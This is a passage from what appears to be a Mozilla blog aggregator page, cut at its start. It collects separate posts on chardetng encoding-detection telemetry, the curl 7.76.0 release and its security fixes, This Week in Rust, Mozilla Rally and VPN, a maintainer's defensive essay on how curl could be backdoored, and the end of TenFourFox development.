Simplified Chinese | CN | 14.1% | 70.6% | 1.1% | 0.1% | 2.7% | 0.1% | 10.8% | 0.6%
Traditional Chinese | HK | 14.0% | 70.6% | 0.5% | 0.1% | 2.7% | 0.1% | 10.8% | 1.2%
Central European | CZ | 25.7% | 69.7% | 0.9% | 0.1% | 1.3% | 0.0% | 2.1% | 0.2%


Recall that for Japan, India, and Sri Lanka, the domestic ccTLDs (.jp, .in, and .lk, respectively) don’t run chardetng, and the table above covers only chardetng outcomes. Armenia, Ethiopia, and Georgia are included as examples where, despite chardetng running on the domestic ccTLD, the primary domestic script has no Web Platform-supported legacy encoding.

When the content is not actually UTF-8, the decision is almost always made from the first kilobyte. We can conclude that chardetng doesn’t reload too much.

GenericFinal for HTML in Egypt is the notable exception. We know from testing with synthetic data that chardetng doesn’t perform well for short inputs of windows-1256. This looks like a real-world confirmation.

The TLD seems to have the most effect in Hungary, which is unsurprising, because it’s hard to make the detector detect Hungarian from the content every time without causing misdetection of other Latin-script encodings.

The most surprising thing in these results is that unlabeled UTF-8 is encountered relatively more commonly than unlabeled legacy encodings, but this is so often detected only after the first kilobyte. If this content was mostly in the primary language of the places listed in the table, UTF-8 should be detected from the first kilobyte. I even re-checked the telemetry collection code on this point to see that the collection works as expected.

Yet, the result of most unlabeled UTF-8 HTML being detected after the first kilobyte repeats all over the world. The notably different case that stands out is mainland China, where the total of unlabeled UTF-8 is lower than elsewhere even if the late detection is still a bit more common than early detection. Since the phenomenon occurs in places where the primary script is not the Latin script but mainland China is different, my current guess is that unlabeled UTF-8 might be dominated by an ad network that operates globally with the exception of mainland China. This result could be caused by ads that have more than a kilobyte of ASCII code and a copyright notice at the end of the file. (Same-origin iframes inherit the encoding from their parent instead of running chardetng. Different-origin iframes, such as ads, could be represented in these numbers, though.)
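The early/late split itself is mechanical: if the first kilobyte contains no non-ASCII bytes, there is nothing yet to distinguish UTF-8 from an ASCII-compatible legacy encoding. A sketch of that check (an illustration of the principle, not the actual detector code):

```rust
/// Returns true if the first kilobyte already contains a non-ASCII
/// byte, i.e. a UTF-8 vs. legacy decision could be made "early".
/// Illustrative only; not the actual chardetng implementation.
fn non_ascii_in_first_kilobyte(content: &[u8]) -> bool {
    let prefix = &content[..content.len().min(1024)];
    prefix.iter().any(|&b| !b.is_ascii())
}

fn main() {
    // Over a kilobyte of ASCII markup followed by non-ASCII text:
    // the decision can only happen "late", after the first kilobyte.
    let mut late = vec![b'a'; 2000];
    late.extend_from_slice("©".as_bytes());
    assert!(!non_ascii_in_first_kilobyte(&late));

    // Non-ASCII near the top: an "early" decision is possible.
    let early = "<title>Čeština</title>".as_bytes();
    assert!(non_ascii_in_first_kilobyte(early));
    println!("ok");
}
```

A page with more than a kilobyte of ASCII boilerplate and the human-readable text at the bottom is exactly the shape that would keep landing in the "late" bucket.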

I think the next step is to limit these probes to top-level navigations only to avoid the participation of ad iframes in these numbers.

Curiously, the late-detected unlabeled UTF-8 phenomenon extends to plain text, too. Advertising doesn’t plausibly explain plain text. This suggests that plain-text loads are dominated by something other than local-language textual content. To the extent scripts and stylesheets are viewed as documents that are navigated to, one would expect copyright legends to typically appear at the top. Could plain text be dominated by mostly-ASCII English regardless of where in the world users are? The text/plain UTF-8 result for the United Kingdom looks exactly like one would expect for English. But why is the UTF-8 text/plain situation so different from everywhere else in South Korea?


Let’s go back to the questions:

Can We Replace the Text Encoding Menu with a Single Menu Item?

Most likely yes, but before doing so, it’s probably a good idea to make chardetng tolerate Big5 byte pairs that conform to the Big5 byte pattern but that are unmapped in terms of the Encoding Standard.

Replacing the Text Encoding menu would probably improve usability considering how the telemetry suggests that users are bad at making the right choice from the menu and bad at diagnosing whether the problem they are seeing can be addressed by the menu. (If the menu had only the one item, we’d be able to disable the menu more often, since we’d be able to better conclude ahead of time that it won’t have an effect.)

Does chardetng have to revise its guess often?

No. For legacy encodings, one kilobyte is most often enough. It’s not worthwhile to make adjustments here.

Does the Top-Level Domain Affect the Guess Often?

It affects the results often in Hungary, which is expected, but not otherwise. Even though the TLD-based adjustments to detection are embarrassingly ad hoc, the result seems to work well enough that it doesn’t make sense to put effort into tuning this area better.

Is Unlabeled UTF-8 So Common as to Warrant Further Action to Support It?

There is a lot of unlabeled UTF-8 encountered relative to unlabeled non-UTF-8, but the unlabeled UTF-8 doesn’t appear to be normal text in the local language. In particular, the early vs. late detection telemetry doesn’t vary in the expected way when the primary local language is near-ASCII-only and when the primary local language uses a non-Latin script.

More understanding is needed before drawing more conclusions.

Is the Unlabeled UTF-8 Situation Different Enough for text/html and text/plain to Warrant Different Treatment of text/plain?

More understanding is needed before drawing conclusions. The text/plain and text/html cases look strangely similar even though the text/plain cases are unlikely to be explainable as advertising iframes.

Action items

Daniel Stenbergcurl 7.76.0 adds rustls

I’m happy to announce that we yet again completed a full eight-week release cycle and, as is customary, we end it with a fresh release. Enjoy!

Release presentation


the 198th release
6 changes
56 days (total: 8,412)

130 bug fixes (total: 6,812)
226 commits (total: 26,978)
0 new public libcurl functions (total: 85)
3 new curl_easy_setopt() options (total: 288)

3 new curl command line options (total: 240)
58 contributors, 34 new (total: 2,356)
24 authors, 11 new (total: 871)
2 security fixes (total: 100)
800 USD paid in Bug Bounties (total: 5,200 USD)


Automatic referer leaks

CVE-2021-22876 is the first curl CVE of 2021.

libcurl did not strip off user credentials from the URL when automatically populating the Referer: HTTP request header field in outgoing HTTP requests, and therefore risks leaking sensitive data to the server that is the target of the second HTTP request.

libcurl automatically sets the Referer: HTTP request header field in outgoing HTTP requests if the CURLOPT_AUTOREFERER option is set. With the curl tool, it is enabled with --referer ";auto".

Rewarded with 800 USD

TLS 1.3 session ticket proxy host mixup

CVE-2021-22890 is a flaw in curl’s OpenSSL backend that allows a malicious HTTPS proxy to trick curl with session tickets and subsequently allow the proxy to MITM the remote server. The problem only exists with OpenSSL and it needs to speak TLS 1.3 with the HTTPS proxy – and the client must accept the proxy’s certificate, which has to be especially crafted for the purpose.

Note that an HTTPS proxy is different from the more common HTTP proxy.

The reporter declined offered reward money.


We list 6 “changes” this time around. They are…

support multiple -b parameters

The command line option for setting cookies can now be used multiple times on the command line to specify multiple cookies. Either by setting cookies by name or by providing the name of a file to read cookie data from.

add –fail-with-body

The command line tool has had the --fail option for a very long time. This new option is very similar, but with a significant difference: this new option saves the response body even when it returns an error due to an HTTP response code that is 400 or larger.

add DoH options to disable TLS verification

When telling curl to use DoH to resolve host names, you can now specify that curl should ignore the TLS certificate verification for the DoH server only, independently of how it treats other TLS servers that might be involved in the transfer.

read and store the HTTP referer header

This is done with the new CURLINFO_REFERER libcurl option and with the command line tool, --write-out '%{referer}'.

support SCRAM-SHA-1 and SCRAM-SHA-256 for mail auth

For SASL authentication done with mail-using protocols such as IMAP and SMTP.

A rustls backend

A new optional TLS backend. This is provided via crustls, a C API for the rustls TLS library.

Some Interesting bug-fixes

Again we’ve logged over a hundred fixes in a release, so here are some of my favorite corrections we did this time:

curl: set CURLOPT_NEW_FILE_PERMS if requested

Due to a silly mistake in the previous release, the new --create-file-mode didn’t actually work because it didn’t set the permissions with libcurl properly – but now it does.

share user’s resolve list with DOH handles

When resolving host names with DoH, the transfers done for that purpose now “inherit” the same --resolve info as used for the normal transfer, which I guess most users already presumed was the case…

bump the max HTTP request size to 1MB

Virtually all internal buffers have length restrictions for security and the maximum size we allowed for a single HTTP request was previously 128 KB. A user with a use-case sending a single 300 KB header turned up and now we allow HTTP requests to be up to 1 MB! I can’t recommend doing it, but now at least curl supports it.

allow SIZE to fail when doing (resumed) FTP upload

In a recent change I made SIZE failures get treated as a “file not found” error, but that introduced a regression for resumed uploads: when resuming a file upload and nothing was uploaded previously, SIZE is expected to fail, and that is fine.

fix memory leak in ftp_done

The torture tests scored another victory when it proved that when the connection failed at just the correct moment after an FTP transfer is complete, curl could skip a free() and leak memory.

fail if HTTP/2 connection is terminated without END_STREAM

When an HTTP/2 connection is (prematurely) terminated, streams over that connection could return “closed” internally without noticing the premature part. As there was no previous END_STREAM message received for the stream(s), curl should consider that an error and now it does.

don’t set KEEP_SEND when there’s no more HTTP/2 data to be sent

A rare race condition in the HTTP/2 code could make libcurl remain expecting to send data when in reality it had already delivered the last chunk.

With HTTP, use credentials from transfer, not connection

Another cleanup in code that had the potential to go wrong in the future and mostly worked right due to lucky circumstances. In HTTP, each request done can use its own set of credentials, so it is vital to not use “connection bound” credentials but rather the “transfer oriented” set. That way streams and requests using different credentials will work fine over a single connection even when future changes alter code paths.

lib: remove ‘conn->data’ completely

A rather large internal refactor that shouldn’t be visible on the outside to anyone: transfer objects now link to the corresponding connection object like before, but now connection objects do not link to any transfer object. Many transfers can share the same connection.

adapt to OpenSSL v3’s new const for a few API calls

The seemingly never-ending work to make a version 3 of OpenSSL keeps changing the API and curl is adapting accordingly so that we are prepared and well functioning with this version once it ships “for real” in the future.

Close the connection when downgrading from HTTP/2 to HTTP/1

Otherwise libcurl is likely to reuse the same (wrong) connection again in the next transfer attempt since the connection reuse logic doesn’t take downgrades into account!

Cap initial HTTP body data amount during send speed limiting

The rate limiting logic was previously not correctly applied to the initial body chunk that libcurl sends; for example, when telling libcurl to send 50K of data with CURLOPT_POSTFIELDS while limiting the sending rate to 5K/second.

Celebratory drink

I’ll go for an extra fine cup of coffee today after I posted this. I think I’m worth it. I bet you are too. Go ahead and join me: Hooray for another release!

This Week In RustThis Week in Rust 384

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No newsletters this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is tide-acme, a crate for automatic HTTPS certification using Let's Encrypt for Tide.

Thanks to Josh Triplett for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

327 pull requests were merged in the last week

Rust Compiler Performance Triage

A somewhat negative week for performance, where regressions outweigh improvements. Sadly, a lot of the regressions don't seem very straightforward to understand, and so more investigation will be necessary.

Triage done by @rylev. Revision range: 9b6339e4..4896450

2 Regressions, 2 Improvements, 3 Mixed

2 of them in rollups

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs




Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Despite all the negative aspects, I must say that I do generally really like the poll-based approach that Rust is taking. Most of the problems encountered are encountered not because of mistakes, but because no other language really has pushed this principle this far. Programming language design is first and foremost an “artistic” activity, not a technical one, and anticipating the consequences of design choices is almost impossible.

tomaka on medium

Thanks to Michael Howell for the suggestion.

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Data@Mozilla: Making your Data Work for you with Mozilla Rally

Every week brings new reports of data leaks, privacy violations, rampant misinformation, or discriminatory AIs. It’s frustrating, because we have so little insight into how major technology companies shape our online experiences.  We also don’t understand the extent of data that online companies collect from us. Without meaningful transparency, we will never address the roots of these problems. 

We are exploring ways to change the dynamics of who controls our data and how we understand our everyday online experiences. In the coming weeks we will launch Mozilla Rally, a participatory data science platform for the Mozilla community.  Rally will invite people to put their data to work, not only for themselves, but for a better society.  

Working alongside other mission-aligned partners, we’ll shine a light on the Internet’s big problems.  We’ll explore ideas for new data products that tip the balance back to consumers. And we’ll do all of this out in the open, sharing and documenting every part of our journey together. You can sign up for the Rally waitlist to be notified when we launch.

Stay tuned!

The Mozilla Blog: Latest Mozilla VPN features keep your data safe

It’s been less than a year since we launched Mozilla VPN, our fast and easy-to-use Virtual Private Network service brought to you by a trusted name in online consumer security and privacy services. Since then we added our Mozilla VPN service to Mac and Linux platforms, joining our VPN service offerings on Windows, Android and iOS platforms. As restrictions are slowly easing up and people are becoming more comfortable leaving their homes, one of the ways to keep your information safe when you go online is our Mozilla VPN service. Our Mozilla VPN provides encryption and device-level protection of your connection and information when you are on the Web.

Today, we’re launching two new features to give you an added layer of protection with our trusted Mozilla VPN service. Mozilla has a reputation for building products that help you keep your information safe. These new features will help users do the following:

For those who watch out for insecure networks

If you’re someone who keeps our Mozilla VPN service off and prefers to turn it on manually, this feature will help you out. We’ll notify you when you’ve joined a network that is not password protected or uses weak encryption. By just clicking on the notification, you can turn the Mozilla VPN service on, giving you an added layer of protection and ensuring every conversation you have is encrypted over the network. This feature is available on Windows, Linux, Mac, Android and iOS platforms.

For those at home, who want to keep all your devices connected

Occasionally, you might need to print out forms for an upcoming doctor visit or your kid’s worksheets to keep them busy. Now, we’ve added Local Area Network Access, so your devices can talk with each other without having to turn off your VPN. Just make sure that the box is checked in Network Settings when you are on your home network.  This feature is available on Windows, Linux, Mac and Android platforms.

Why use our trusted Mozilla VPN service?

Since our launch last year, we’ve had thousands of people sign up to use our trusted Mozilla VPN service. Mozilla has built a reputation for building products that respect your privacy and keep your information safe. With the Mozilla VPN service you can be sure your activity is encrypted across all applications and websites, whatever device you are on.

With no long-term contracts required, the Mozilla VPN is available for just $4.99 USD per month in the United States, Canada, the United Kingdom, Singapore, Malaysia, and New Zealand. We have plans to expand to other countries this Spring.

We know that it’s more important than ever for you to feel safe, and for you to know that what you do online is your own business. Check out the Mozilla VPN and subscribe today from our website.



Andrew Halberstadt: Advanced Mach Try

Following up last week’s post on some mach try fundamentals, I figured it would be worth posting some actual concrete tips and tricks. So without further ado, here are some things you can do with ./mach try you may not have known about in rapid fire format.

Daniel Stenberg: HOWTO backdoor curl

I’ve previously blogged about the possible backdoor threat to curl. This post is partly a repeat, but also a refreshed take on the subject several years later, in the shadow of the recent PHP backdoor commits of March 28, 2021. Nowadays, “supply chain attacks” is a hot topic.

Since you didn’t read that PHP link: an unknown project outsider managed to push a commit into the PHP master source code repository with a change (made to look as if done by two project regulars) that obviously inserted a backdoor that could execute custom code when a client tickled a modified server the right way.

(Partial screenshot of a diff of the offending commit in question)

The commits were apparently detected very quickly. I haven’t seen any proper analysis of exactly how they were performed, but to me that’s not the ultimate question. I’d rather talk and think about this threat from a curl perspective.

PHP is extremely widely used and so is curl, but where PHP is (mostly) server-side running code, curl is client-side.

How to get malicious code into curl

I’d like to think about this problem from an attacker’s point of view. There are but two things an attacker needs to do to get a backdoor in, plus a third adjacent step that needs to happen:

  1. Make a backdoor change that is hard to detect and appears innocent to a casual observer, while actually still being able to do its “job”
  2. Get that change landed in the master source code repository branch
  3. The code needs to be included in a curl release that is used by the victim/target

These are not simple steps. The third step, getting into a release, is not strictly always necessary because there are sometimes people and organizations that run code off the bleeding edge master repository (against our advice I should add).

Writing the backdoor code

As was seen in this PHP attack, it failed rather miserably at step 1: the attack code did not look innocuous, although we can suspect that maybe that was done on purpose. In 2010 there was a lengthy discussion about an alleged backdoor in OpenBSD’s IPSEC stack that presumably had been in place for years, and even though that particular backdoor was never proven to be real, the idea that it can be done certainly is.

Every time we fix a security problem in curl there’s that latent nagging question in the back of our collective minds: was this flaw placed here deliberately? Historically, we’ve not seen any such attacks against curl. I can say this with a high degree of certainty since almost all of the existing security problems detected and reported in curl were found by me…!

The best attack code would probably do something minor that would have a huge impact in a special context for which the attacker has planned to use it. I mean minor as in doing a NULL-pointer dereference or doing a use-after-free or something. This, because doing a full-fledged generic stack based buffer overflow is much harder to land undetected. Maybe going with a single-byte overwrite outside of a malloc could be the way, like it was back in 2016 when such a flaw in c-ares was used as the first step in a multi-flaw exploit sequence to execute remote code as root on ChromeOS…

Ideally, the commit should also include an actual bug-fix that would be the public facing motivation for it.

Get that code landed in the repo

Okay let’s imagine that you have produced code that actually is a useful bug-fix or feature addition but with an added evil twist, and you want that landed in curl. I can imagine several different theoretical ways to do it:

  1. A normal pull-request and land using the normal means
  2. Tricking or forcing a user with push rights to circumvent the review process
  3. Use a weakness somewhere and land the code directly without involving existing curl team members

The Pull Request method

I’ve never seen this attempted. Submit the pull-request to the project through the usual means and argue that the commit fixes a bug, which could even be true.

This means the backdoor patch has to pass all testing and reviews with flying colors to get merged. I’m not saying this is impossible, but I will claim that it is very hard and also a very big gamble by an attacker. Presumably it is a fairly big job just to get the code for this attack to work, so maybe going with a less risky way to land the code is preferable? But then which way is likely to have the most reliable outcome?

The tricking a user method

Social engineering is very powerful. I can’t claim that our team is immune to that so maybe there’s a way an outsider could sneak in behind our imaginary personal walls and make us take a shortcut for a made up reason that then would circumvent the project’s review process.

We can even include more forced “convincing” such as direct threats against persons or their families: “push this code or else…”. This of course cannot be protected against using 2FA, better passwords or things like that. Forcing a user to do it is also likely to eventually become known and then get the commit immediately reverted.

Tricking a user doesn’t make the commit avoid testing and scrutinizing after the fact. When the code has landed, it will be scanned and tested in a hundred CI jobs that include a handful of static code analyzers and memory/address sanitizers.

Tricking a user could land the code, but it can’t make it stick unless the code is written as the perfect stealth change. It really needs to be that good attack code to work out. Additionally: circumventing the regular pull-request + review procedure is unusual, so I believe it is likely that such a commit will be reviewed and commented on after the fact, and there might then be questions about it and even likely follow-up actions.

The exploiting a weakness method

A weakness in this context could be a security problem in the hosting software or even a rogue admin in the company that hosts the main source code git repo. Something that allows code to get pushed into the code repository without it being the result of one of the existing team members. This seems to be the method that the PHP attack was done through.

This is a hard method as well. Not only does it shortcut reviews, it is also done in the name of someone on the team who knows for sure that they didn’t do the commit, and again, the commit will be tested and poked at anyway.

For all of us who sign our git commits, detecting such a forged commit is easy and quickly done. In the curl project we don’t have mandatory signed commits so the lack of a signature won’t actually block it. And who knows, a weakness somewhere could even possibly find a way to bypass such a requirement.

The skip-git-altogether methods

As I’ve described above, it is really hard even for a skilled developer to write a backdoor and have that landed in the curl git repository and stick there for longer than just a very brief period.

If the attacker instead can just sneak the code directly into a release archive then it won’t appear in git, it won’t get tested and it won’t get easily noticed by team members!

curl release tarballs are made by me, locally on my machine. After I’ve built the tarballs I sign them with my GPG key and upload them to the curl.se origin server for the world to download. (Web users don’t actually hit my server when downloading curl. The user visible web site and downloads are hosted by Fastly servers.)

An attacker who could infect my release scripts (which btw are also in the git repository) or compromise my machine could get something into the tarball, have me sign it, and thus create the “perfect backdoor”: one that isn’t detectable in git and that requires someone to diff the release against git in order to detect, which usually isn’t done by anyone that I know of.

But such an attacker would not only have to breach my development machine; such an infection of the release scripts would also be awfully hard to pull off. Not impossible, of course. I do my best to maintain proper login hygiene, updated operating systems and use of safe passwords and encrypted communications everywhere. But I’m also human, so I’m bound to make occasional mistakes.

Another way could be for the attacker to breach the origin download server and replace one of the tarballs there with an infected version, and hope that people skip verifying the signature when they download it, or don’t otherwise notice that the tarball has been modified. I do my best at maintaining server security to keep that risk to a minimum. Most people download the latest release, and then it’s enough if a subset checks the signature for the attack to be revealed sooner rather than later.

The further-down-the-chain method

As an attacker, get into the supply chain somewhere else: find a weaker link in the chain between the curl release tarball and the target system for your attack. If you can trick or social-engineer someone else along the way into using your evil curl tarball instead of the actual upstream tarball, that might be easier and give you more bang for your buck. Perhaps you target your particular distribution’s or operating system’s release engineers, pretend to be from the curl project, make up a story and send over a tarball to help them out…

Fake a security advisory and send out a bad patch directly to someone you know builds their own curl/libcurl binaries?

Better ways?

If you can think of other or better ways to get malicious code into a victim’s machine via curl, let me know! If you find a security problem, we will reward you for it!

Similarly, if you can think of ways or practices on how we can improve the project to further increase our security I’ll be very interested. It is an ever-moving process.


Added after the initial post. Lots of people have mentioned that curl can get built with many dependencies and maybe one of those would be an easier or better target. Maybe they are, but they are products of their own individual projects and an attack on those projects/products would not be an attack on curl or backdoor in curl by my way of looking at it.

In the curl project we ship the source code for curl and libcurl, and the users, the ones that build the binaries from that source code, will get the dependencies too.


Image by SeppH from Pixabay

Support.Mozilla.Org: Introducing Daryl Alexsy

Hey everybody,

Please join us in welcoming Daryl Alexsy to the Customer Experience team! Daryl is a Senior User Experience Designer who will be helping SUMO as well as the MDN team. Please say hi to Daryl!


Here’s a short introduction from her:

Hi everyone! I’m Daryl, and I’ll be joining the SUMO team as a UX designer. I am looking forward to working together with you all to create a better experience for both readers and contributors of the platform, so please don’t hesitate to reach out with any observations or suggestions for how we can make that happen.


Welcome Daryl!

Cameron Kaiser: The end of TenFourFox and what I've learned from it

Now that I have your attention.

I've been mulling TenFourFox's future for a while now in light of certain feature needs that are far bigger than a single primary developer can reasonably take on, and recent unexpected changes to my employment, plus other demands on my time, have unfortunately accelerated this decision.

TenFourFox FPR32 will be the last official feature parity release of TenFourFox. (A beta will come out this week, stay tuned.) However, there are still many users of TenFourFox — the update server reports about 2,000 daily checkins on average — and while nothing has ever been owed or promised I also appreciate that many people depend on it, so there will be a formal transition period. After FPR32 is released TenFourFox will drop to security parity and the TenFourFox site will become a placeholder. Security parity means that the browser will only receive security updates plus certain critical fixes (as I define them, such as crash wallpaper, basic adblock and the font blacklist). I will guarantee security and stability patches through and including Firefox 93 (scheduled for September 7) to the best of my ability, which is also the point at which Firefox 78ESR will stop support, and I will continue to produce, generate and announce builds of TenFourFox with those security updates on the regular release schedule with chemspills as required. There will be no planned beta releases after FPR32 but Tenderapp will remain available to triage bugfixes for new changes only.

After that date, for my own use I will still make security patches backported from the new Firefox 91ESR publicly available on Github and possibly add any new features I personally need, but I won't promise these on any particular timeline, I won't make or release any builds for people to download, I won't guarantee any specific feature or fix, I won't guarantee timeliness or functionality, and there will be no more user support of any kind including on Tenderapp. I'll call this "hobby mode," because the browser will be a hobby I purely maintain for myself, with no concessions, no version tags (rolling release only), no beta test period and no regular schedule. You can still use it, but if you want to do so, you will be responsible for building the browser yourself and this gives you a few months to learn how. Also, effective immediately, there will be no further updates to TenFourFoxBox, the QuickTime Enabler, the MP4 Enabler or the TenFourFox Downloader, though you will still be able to download them.

Unless you have a patch or pull request or it's something I care about, if you open an issue on Github it will be immediately closed. Similarly, any currently open issues I don't intend to address will be wound down over the next few weeks. However, this blog and the Github wiki will still remain available indefinitely, including all the articles, and all downloads on SourceForge will remain accessible as well. I'll still post here as updates are available along with my usual occasional topics of relevance to Power Mac users.

Classilla, for its part, is entering "hobby mode" today and I will do no further official public work on it. However, I am releasing the work I've already done on 9.3.4, such as it is, plus support for using Crypto Ancienne for self-hosted TLS 1.2 if you are a Power MachTen user (or running it in Classic or under Mac OS in Rhapsody). You can read more about that on Old VCR, my companion retrocomputing blog.

I'm proud of what we've accomplished. While TenFourFox was first and foremost a browser for me personally, it obviously benefited others. It kept computers largely useable that today are over fifteen years old and many of them even older. In periods of a down economy and a global pandemic this helped people make ends meet and keep using what they had an investment in. One of my favourite reports was from a missionary in Myanmar using a beat-up G4 mini over a dialup modem; I hope he is safe during the present unrest.

I'm also proud of the fair number of TenFourFox features that were successfully backported or completely new. TenFourFox was the first and still one of the few browsers on PowerPC Mac OS X to support TLS 1.3 (or even 1.2), and we are the only such browser with a JavaScript JIT. We also finished a couple features long planned for mainline Firefox but that never made it, such as our AppleScript (and AppleScript-JavaScript bridge) support. Our implementation even lets you manipulate webpages that may not work properly to function usefully. Over the decade TenFourFox has existed we also implemented our own native date and time controls, basic ad block, advanced Reader View (including sticky and automatic features), additional media support (MP3, MP4 and WebP), additional features and syntax to JavaScript, and AltiVec acceleration in whatever various parts of the browser we could. There are also innumerable backported bug fixes throughout major portions of the browser which repair long-standing issues. All of this kept Firefox 45, our optimal platform base, useful for far longer than the sell-by date and made it an important upstream source for other legacy browsers (including, incredibly, OS/2). You can read about the technical differences in more detail.

Many people have contributed to TenFourFox and to the work above, and they're credited in the About window. Some, like Chris T, Ken Cunningham and OlgaTPark, still contribute. I've appreciated everyone's work on the source code, the localizations and their service in the user support forums. They've made the job a little easier. There are not enough thank yous for these good people.

When September rolls around, if you don't want to build the browser yourself it is possible some downstream builders like Olga may continue backports. I don't speak for them and I can't make promises on their behalf. Olga's builds run on 10.4, 10.5 and 10.6. If you choose to make your own builds and release them to users, please use a different name for your builds than TenFourFox so that I don't get bothered for support for your work (Olga has a particular arrangement with me but I don't intend to repeat it for others).

You might also consider another browser. On PowerPC 10.5 your best alternative is Leopard WebKit. It has not received recent updates but many of you use it already. I don't maintain or work on LWK, but there is some TenFourFox code in it, and Tobias has contributed to TenFourFox as well. If you don't want to use Safari specifically, LWK can be relinked against most WebKit shells including Stainless and Roccat.

If you are using TenFourFox on 10.6, you could try using Firefox Legacy, which is based on Firefox 52. It hasn't been updated in about a year but it does have a more recent platform base than official Firefox for 10.6 or TenFourFox.

However, if you are using TenFourFox on 10.4 (PowerPC or Intel), I don't have any alternative suggestions for you. I am not aware of any other vaguely modern browser that supports Tiger. Although some users have tried TenFourKit, it does not support TLS 1.1 or 1.2 (only Opera 10.63 does), and OmniWeb, Camino, Firefox 3.6 and the briefly available Tor Browser for PowerPC are now too old to recommend for any reasonable current use.

So, that's the how. Here's the why and what. I have a fairly firm rule that I don't maintain software I don't personally use. The reason for that is mostly time, since I don't have enough spare cycles to work on stuff that doesn't benefit me personally, but it's also quality: I can't maintain a quality product if I don't dogfood it myself. And my G5 has not been my daily driver for a good couple years; my daily driver is the Raptor Talos II. I do use the G5 but for certain specific purposes and not on a regular daily basis.

Additionally, I'm tired. It's long evenings coding to begin with, but actual development time is only the start of it. It's also tying up the G5 for hours to chug out the four architecture builds and debug (at least) twice a release cycle, replying to bug reports, scanning Bugzilla, reading the changelogs for security updates and keeping up with new web features in my shrinking spare time after doing the 40+-hour a week job I actually got paid for. Time, I might add, which is taken away from my other hobbies and my personal relaxation, and time which I would not need to spend if I did this purely as a hobby and never released any of it. Now that Firefox is on a four-week release schedule, it's just more than I feel I can continue to commit to and I'm neglecting the work I need to do on the system that I really do use every day.

We're running on fumes technologically as well. Besides various layout and DOM features we don't support well like CSS grid, there are large JavaScript updates we'll increasingly need which are formidably complex tasks. The biggest is async and await support which landed in Firefox 52, and which many sites now expect to run at all. However, at the time it required substantial changes to both JavaScript and the runtime environment and had lots of regressions and bugs to pick up. We have some minimal syntactic support for the feature but it covers only the simplest of use cases incompletely. There are also front end changes required to deal with certain minifiers (more about this in a moment) but they can all be traced back to a monstrous 2.5MB commit which is impossible to split up piecemeal. We could try to port 52ESR as a whole, but we would potentially suffer some significant regressions in the process, and because there is no Rust support for 32-bit PowerPC on OS X we couldn't build anything past Firefox 54 anyway. All it does is just get us that much closer to an impenetrable dead end. It pains me to say so, but it's just not worth it, especially if I, the browser's only official beneficiary, am rarely using it personally these days. It's best to hang it up here while the browser still works for most practical purposes and people can figure out their next move, rather than vainly struggling on with token changes until the core is totally useless.

Here is what I have learned working on TenFourFox and, for that matter, Classilla.

Writing and maintaining a browser engine is fricking hard and everything moves far too quickly for a single developer now. However, JavaScript is what probably killed TenFourFox quickest. For better or for worse, web browsers' primary role is no longer to view documents; it is to view applications that, by sheer coincidence, sometimes resemble documents. You can make workarounds to gracefully degrade where we have missing HTML or DOM features, but JavaScript is pretty much run or don't, and more and more sites just plain collapse if any portion of it doesn't. Nowadays front ends have become impossible to debug by outsiders and the liberties taken by JavaScript minifiers are demonstrably not portable. No one cares because it works okay on the subset of browsers they want to support, but someone bringing up the rear like we are has no chance because you can't look at the source map and no one on the dev side has interest in or time for helping out the little guy. Making test cases from minified JavaScript is an exercise in untangling spaghetti that has welded itself together with superglue all over your chest hair, worsened by the fact that stepping through JavaScript on geriatric hardware with a million event handlers like waiting mousetraps is absolute agony. With that in mind, who's surprised there are fewer and fewer minority browser engines? Are you shocked that attempts like NetSurf, despite its best intentions and my undying affection for it, are really just toys if they lack full script runtimes? Trying and failing to keep up with the scripting treadmill is what makes them infeasible to use. If you're a front-end engineer and you throw in a dependency on Sexy Framework just because you can, don't complain when you only have a minority of browser choices because you're a big part of the problem.

Infrastructure is at least as important as the software itself. A popular product incurs actual monetary costs to service it. It costs me about US$600 a month, on average, to run my home data center where Floodgap sits (about ten feet away from this chair) between network, electricity and cooling costs. TenFourFox is probably about half its traffic, so offloading what we can really reduces the financial burden, along with the trivial amount of ad revenue which basically only pays for the domain names. Tenderapp for user support, SourceForge for binary hosting, Github for project management and Blogger for bloviating are all free, along with Google Code where we originally started, which helped a great deal in making the project more sustainable for me personally even if ultimately I was shifting those ongoing costs to someone else. However, the biggest investment is time: trying to stick to a regular schedule when the ground is shifting under your feet is a big chunk out of my off hours, and given that my regular profession is highly specialized and has little to do with computing, you can't really pay me enough to dedicate my daily existence to TenFourFox or any other open-source project because I just don't scale. (We never accepted donations anyway, largely to avoid people thinking they were "buying" something.) I know some people make their entire living from free open source projects. I think those people are exceptions and noteworthy precisely because of their rarity. Most open source projects, even ones with large userbases, are black holes ultimately and always will be.

